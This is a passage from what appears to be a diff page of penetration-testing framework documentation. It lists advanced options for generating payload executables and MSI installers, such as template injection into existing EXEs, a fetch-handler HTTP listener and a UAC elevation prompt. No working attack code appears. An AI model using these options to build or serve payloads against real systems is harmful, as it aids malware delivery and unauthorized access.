EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user